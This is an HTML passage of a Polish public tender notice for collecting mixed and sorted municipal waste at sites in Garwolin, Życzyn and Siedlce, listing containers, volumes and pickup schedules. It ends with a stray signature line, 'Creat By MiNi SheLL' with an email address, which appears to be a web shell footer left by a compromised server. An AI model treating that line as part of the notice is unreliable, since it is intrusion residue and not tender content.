<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 -  KOMPLEKS GARWOLIN 08-430; UL. KOŚCIUSZKI 28 - K-0187 wywóz odpadów komunalnych stałych niesegregowanych zmieszanych  kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 -  KOMPLEKS GARWOLIN 08-430; UL. KOŚCIUSZKI 28 - K-0187 wywóz odpadów komunalnych stałych niesegregowanych (zmieszanych) - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
szkło - kod odpadu 20 01 02, 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
	Częstotliwość wywozu

Garwolin   08-430    ul. Kościuszki 28	K-0187	do 1,1m3	1	28,6	co 2 tygodnie
segregacja papier 1,1	1	13,2	raz w miesiącu
segregacja plastik 1,1	1	3,3	na zgłoszenie tel.
segregacja szkło 1,1	1	3,3	na zgłoszenie tel..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 - KOMPLEKS ŻYCZYN - wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3 - KOMPLEKS ŻYCZYN - wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01 i odpadów komunalnych stałych segregowanych typu: 
papier i tektura - kod odpadu 20 01 01  
tworzywa sztuczne - kod odpadu 20 01 39 
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
Częstotliwość wywozu

Życzyn                          Podebłocie 	K-0315	do 1,1 m3	3	39,6	raz w miesiącu
segregacja papier 1,1	1	6,6	raz na 2 miesiące
segregacja plastik 1,1	1	6,6	raz na 2 miesiące

Życzyn	K-0507	do 1,1m3	1	13,2	raz w miesiącu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4 - SIEDLCE - wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4 - SIEDLCE - wywóz odpadów komunalnych stałych niesegregowanych zmieszanych - kod odpadu  20 03 01.
Miejscowość	Kompleks	Rodzaj pojemnika	Ilość pojemników	Przwidywana ilość wywiezionych nieczystości w okresie trwania umowy w m3
Częstotliwość wywozu
Siedlce   08-110  ul. Składowa 39	K-0951	do 1,1m3	3	171,6	raz w tygodniu
		do 1,1 m3	8	228,8	co 2 tygodnie
		od 5 m3	1	130	co 2 tygodnie
Siedlce  08-110  ul. Wałowa 1	K-0952	do 1,1 m3	2	57,2	co 2 tygodnie
Siedlce -Grabianów	K-0955	do 1,1 m3	1	28,6	co 2 tygodnie
Siedlce  08-110 ul. Plac Tysiąclecia 1	K-0960	0,12 m3	2	6,24	co 2 tygodnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com